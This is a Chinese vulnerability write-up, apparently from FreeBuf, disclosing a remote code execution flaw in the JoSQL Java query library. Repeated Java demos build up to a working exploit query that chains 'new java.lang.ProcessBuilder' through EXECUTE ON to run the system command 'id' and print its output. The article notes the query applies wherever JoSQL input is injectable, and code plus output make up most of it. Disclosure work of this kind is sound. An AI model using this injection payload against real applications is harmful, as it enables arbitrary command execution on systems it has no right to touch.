JoSQL内存数据库远程代码执行漏洞(含EXP)
JoSQL全称SQL for Java Objects,提供了应用SQL语句的Java对象的集合的能力开发,JoSQL提供了搜索,排序,group等对Java对象的集合进行类似SQL的查询应该应用的功能。
例如,查找所有在2004年内修改过的html文件:
SELECT *
FROM java.io.File
WHERE name $LIKE "%.html"
AND toDate (lastModified) BETWEEN toDate ('01-12-2004')
AND toDate ('31-12-2004')
java中使用JoSQL:
// 获取 java.io.File 列表.
List myObjs = getMyObjects ();
// 创建查询对象.
Query q = new Query ();
// Parse the SQL you are going to use, it is assumed here that
// "myObjs" contains instances of "java.io.File".
q.parse ("SELECT name,length " +
"FROM java.io.File " +
"WHERE fileExtension (name) = :fileExt " +
"ORDER BY length DESC, name " +
"EXECUTE ON RESULTS avg (:_allobjs, length) avgLength");
// 绑定参数类似于预编译模式设置参数
q.setVariable ("fileExt", "java");
// 执行查询.
QueryResults qr = q.execute (myObjs);
// Get the average length, this is a save value, the result
// of executing the call "avg (:_allobjs, length)", it is saved against
// key: "avgLength".
Map saveValues = qr.getSaveValues ();
Number avg = (Number) saveValues.get ("avgLength");
// 循环读取结果
List res = qr.getResults ();
for (int i = 0; i < res.size (); i++)
{
// This time there is a List for each row, index 0 holds the name of
// the file that matched, index 1 holds the length.
List r = (List) res.get (i);
System.out.println ("NAME: " + r.get (0));
System.out.println ("LENGTH: " + r.get (1) + ", AVG: " + avg);
}
具体其他详细操作可参考:http://josql.sourceforge.net
下面分析下远程代码造成的原因
1.首先写一个demo查询从User列表中查询:
package josql;
import java.util.ArrayList;
import java.util.List;
import org.josql.Query;
import org.josql.QueryResults;
public class Demo {
/**
* user对象
*
* @author nike
*
*/
class User {
private String username;
private String password;
public String getUsername() {
return username;
}
public void setUsername(String username) {
this.username = username;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
public void help() {
System.out.println("help method:"+username + "|" + password);
}
}
/**
* 获取user列表用来作为查询集
*
* @return
*/
public List<User> getObjs() {
List<User> users = new ArrayList<User>();
User a = new User();
a.setUsername("nike");
a.setPassword("cb39554898fc98f9329d37242045e728");
User b = new User();
b.setUsername("smith");
b.setPassword("12345678");
users.add(a);
users.add(b);
return users;
}
public void query() {
List<User> myObjs = getObjs();
Query q = new Query();
try {
q.parse("SELECT * from josql.Demo$User");
QueryResults qr = q.execute(myObjs);
@SuppressWarnings("unchecked")
List<User> res = qr.getResults();
for (int i = 0; i < res.size(); i++) {
User user = (User)res.get(i);
System.out.println("username:"+user.username+"|password:"+user.password);
}
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Demo demo = new Demo();
demo.query();
}
}
上面代码运行结果是:
username:nike|password:cb39554898fc98f9329d37242045e728 username:smith|password:12345678
现在将sql语句换成:
package josql;
import java.util.ArrayList;
import java.util.List;
import org.josql.Query;
import org.josql.QueryResults;
public class Demo {
/**
* user对象
*
* @author nike
*
*/
class User {
private String username;
private String password;
public String getUsername() {
return username;
}
public void setUsername(String username) {
this.username = username;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
public void help() {
System.out.println("help method:"+username + "|" + password);
}
}
/**
* 获取user列表用来作为查询集
*
* @return
*/
public List<User> getObjs() {
List<User> users = new ArrayList<User>();
User a = new User();
a.setUsername("nike");
a.setPassword("cb39554898fc98f9329d37242045e728");
User b = new User();
b.setUsername("smith");
b.setPassword("12345678");
users.add(a);
users.add(b);
return users;
}
public void query() {
List<User> myObjs = getObjs();
Query q = new Query();
try {
q.parse("SELECT help from josql.Demo$User");
QueryResults qr = q.execute(myObjs);
@SuppressWarnings("unchecked")
List<User> res = qr.getResults();
for (int i = 0; i < res.size(); i++) {
System.out.println(res.get(i));
}
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Demo demo = new Demo();
demo.query();
}
}
则运行结果:
help method:nike|cb39554898fc98f9329d37242045e728 help method:smith|12345678 [null] [null]
从上面结果就可以看出help方法被调用了,从而可以得知joSQL可以调用无参函数(关键)。
2.joSQL存在一个特性,即可以通过new来构造一个新的对象比如:
package josql;
import java.util.ArrayList;
import java.util.List;
import org.josql.Query;
import org.josql.QueryResults;
public class Demo {
/**
* user对象
*
* @author nike
*
*/
class User {
private String username;
private String password;
public String getUsername() {
return username;
}
public void setUsername(String username) {
this.username = username;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
public void help() {
System.out.println("help method:"+username + "|" + password);
}
}
/**
* 获取user列表用来作为查询集
*
* @return
*/
public List<User> getObjs() {
List<User> users = new ArrayList<User>();
User a = new User();
a.setUsername("nike");
a.setPassword("cb39554898fc98f9329d37242045e728");
User b = new User();
b.setUsername("smith");
b.setPassword("12345678");
users.add(a);
users.add(b);
return users;
}
public void query() {
List<User> myObjs = getObjs();
Query q = new Query();
try {
q.parse("SELECT new josql.Demo() from josql.Demo$User");
QueryResults qr = q.execute(myObjs);
@SuppressWarnings("unchecked")
List<User> res = qr.getResults();
for (int i = 0; i < res.size(); i++) {
System.out.println(res.get(i));
}
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Demo demo = new Demo();
demo.query();
}
}
执行结果:
josql.Demo@447ffd8e josql.Demo@2edf98c4
3.joSQL另外一个特性就是可以通过EXECUTE ON支持函数式编程。其执行结果可以通过变量作为其他查询参数来调用
语法:EXECUTE ON ALL | RESULTS | GROUP_BY_RESULTS Expression [ , Expression ]* [ [ AS ] Alias ]
例子:
package josql;
import java.util.ArrayList;
import java.util.List;
import org.josql.Query;
import org.josql.QueryResults;
public class Demo {
/**
* user对象
*
* @author nike
*
*/
class User {
private String username;
private String password;
public String getUsername() {
return username;
}
public void setUsername(String username) {
this.username = username;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
public void help() {
System.out.println("help method:"+username + "|" + password);
}
}
/**
* 获取user列表用来作为查询集
*
* @return
*/
public List<User> getObjs() {
List<User> users = new ArrayList<User>();
User a = new User();
a.setUsername("nike");
a.setPassword("cb39554898fc98f9329d37242045e728");
User b = new User();
b.setUsername("smith");
b.setPassword("12345678");
users.add(a);
users.add(b);
return users;
}
public void query() {
List<User> myObjs = getObjs();
Query q = new Query();
try {
q.parse("SELECT username from josql.Demo$User group by @a EXECUTE ON ALL new josql.Demo() AS a");
QueryResults qr = q.execute(myObjs);
@SuppressWarnings("unchecked")
List<User> res = qr.getResults();
for (int i = 0; i < res.size(); i++) {
System.out.println(res.get(i));
}
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Demo demo = new Demo();
demo.query();
}
}
执行结果:
[josql.Demo@4094de98]
从结果中可以看到Demo成功被创建。
结合第1,2,3点可以执行无参函数,则我们可以调用ProcessBuilder的start可以执行系统命令。
package josql;
import java.util.ArrayList;
import java.util.List;
import org.josql.Query;
import org.josql.QueryResults;
public class Demo {
/**
* user对象
*
* @author nike
*
*/
class User {
private String username;
private String password;
public String getUsername() {
return username;
}
public void setUsername(String username) {
this.username = username;
}
public String getPassword() {
return password;
}
public void setPassword(String password) {
this.password = password;
}
public void help() {
System.out.println("help method:"+username + "|" + password);
}
}
/**
* 获取user列表用来作为查询集
*
* @return
*/
public List<User> getObjs() {
List<User> users = new ArrayList<User>();
User a = new User();
a.setUsername("nike");
a.setPassword("cb39554898fc98f9329d37242045e728");
User b = new User();
b.setUsername("smith");
b.setPassword("12345678");
users.add(a);
users.add(b);
return users;
}
public void query() {
List<User> myObjs = getObjs();
Query q = new Query();
try {
q.parse("SELECT
username from josql.Demo$User where 1=1 group by
@c.readLine,@c.readLine EXECUTE ON ALL new
java.lang.ProcessBuilder(['id']) AS a, "
+ "new java.io.InputStreamReader(@a.start.getInputStream) as b, new java.io.BufferedReader(@b) as c");
QueryResults qr = q.execute(myObjs);
@SuppressWarnings("unchecked")
List<User> res = qr.getResults();
for (int i = 0; i < res.size(); i++) {
System.out.println(res.get(i));
}
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Demo demo = new Demo();
demo.query();
}
}
执行结果:
[uid=501(nike) gid=20(staff) groups=20(staff),501(access_bpf),401(com.apple.sharepoint.group.1),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),33(_appstore),100(_lpoperator),204(_developer),398(com.apple.access_screensharing),399(com.apple.access_ssh), null] [null, null]
则系统命令成功被执行。
利用场景
当某处查询利用了joSQL并且存在注入,则通过这个漏洞直接调用系统命令。
[作者/安恒信息(企业账号),转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)]